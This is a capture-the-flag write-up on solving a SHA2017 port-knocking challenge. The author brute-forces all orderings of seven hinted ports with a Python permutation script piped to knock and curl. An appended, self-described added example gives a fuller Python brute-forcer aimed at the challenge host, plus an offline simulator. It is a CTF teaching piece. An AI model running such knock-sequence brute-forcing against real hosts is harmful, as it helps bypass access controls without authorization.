SHA2017 CTF writeup — Vod Kanockers

Cong Wang
Aug 8, 2017 · 2 min read

The name is Kanockers. Vod Kanockers.

Click the link and view the source of that page. Find out the hint:

<!-- *Knock Knock* 88 156 983 1287 8743 5622 9123 -->

This reminds me of https://wiki.archlinux.org/index.php/Port_knocking. A knock daemon watches for connection attempts (SYNs) to a predefined sequence of ports, and once it has seen them in the right order it opens some other port, either one in this list or one outside it, to the knocking client.

Let's find out which of them are not simply closed. Try curl against each of them: every port except the last one answers with a RST (closed, nothing filtering it), while 9123 just times out, i.e. our SYNs are being dropped by a firewall rule. That makes 9123 the most likely target port.

Then try to knock them with the command knock:

knock vod.stillhackinganyway.nl 88 156 983 1287 8743 5622 9123 -v

and try curl on 9123 again: still no response, our SYN packets are still dropped there. So either the "target" port is not 9123, or the order above is not the correct knock sequence.

Use nmap to scan the host and check whether any other port, outside this list, is open. Nope!

Now we have to figure out the order! It is quite easy to brute force these 7! = 5040 sequences with the following Python code:

import itertools

# Print every ordering of the seven ports from the hint, one sequence per line.
for l in itertools.permutations([88, 156, 983, 1287, 8743, 5622, 9123]):
    print(" ".join(map(str, l)))

Now pipe each line of the output to knock, and after every knock probe port 9123 with a short connect timeout:

python permute_ports.py | while read i
do
    echo $i
    knock vod.stillhackinganyway.nl $i
    curl --connect-timeout 1 vod.stillhackinganyway.nl:9123
done

The flag will be shown.
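The same brute force, written as a self-contained Python client instead of a shell loop around knock and curl. This is an added example, not code from the original writeup: knock_tcp() sends one SYN per port in order (the connect result is irrelevant, only the SYN matters to the daemon), port_open_tcp() checks whether a full handshake to the target now succeeds, and brute_force_sequence() walks the 5040 permutations until one opens the target. The KnockSimulator class is a constructed stand-in for a knock daemon so the logic can be exercised offline; the secret order it is given below is an assumption for testing, not the challenge's real sequence. The host name and ports are the ones from the hint.

```python
import itertools
import socket
import sys

# Ports from the HTML comment on the challenge page, and the one port that
# dropped our SYNs instead of answering with a RST.
KNOCK_PORTS = [88, 156, 983, 1287, 8743, 5622, 9123]
TARGET_PORT = 9123
HOST = "vod.stillhackinganyway.nl"


def knock_tcp(host, ports, timeout=0.3):
    """Send one TCP SYN per port, in order, by attempting a connect.

    A knock daemon only watches for the SYN, so whether the connect succeeds,
    is refused or times out does not matter; the short timeout keeps a
    filtered port from stalling the whole sequence.
    """
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect_ex((host, port))
        except OSError:
            pass  # timeout / unreachable: the SYN has already left
        finally:
            s.close()


def port_open_tcp(host, port, timeout=1.0):
    """True if a TCP handshake to host:port completes (connect_ex returns 0)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        return s.connect_ex((host, port)) == 0
    except OSError:
        return False
    finally:
        s.close()


def brute_force_sequence(host, ports, target, knock=knock_tcp, probe=port_open_tcp):
    """Try every ordering of `ports`; return the first one that opens `target`.

    `knock` and `probe` are injectable so the search can be run against a
    simulator instead of the network.
    """
    for seq in itertools.permutations(ports):
        knock(host, seq)
        if probe(host, target):
            return list(seq)
    return None


class KnockSimulator:
    """Constructed stand-in for a knock daemon, for offline testing only.

    The target counts as open once the most recent len(secret) knocks
    equal `secret`, in order.
    """

    def __init__(self, secret, target):
        self.secret = list(secret)
        self.target = target
        self.history = []

    def knock(self, host, ports):
        self.history.extend(ports)

    def probe(self, host, port):
        n = len(self.secret)
        return port == self.target and self.history[-n:] == self.secret


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else HOST
    found = brute_force_sequence(host, KNOCK_PORTS, TARGET_PORT)
    print("knock sequence that opened port %d: %s" % (TARGET_PORT, found))
```

Run it with no arguments to go after the challenge host, or pass another host name. Against a real knockd, each permutation costs up to seven knocks plus one probe, so the 0.3 s knock timeout matters more than anything else for total run time; a daemon with a sequence timeout shorter than that would need the knocks sent faster (raw SYNs rather than full connect attempts).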

Happy hacking!
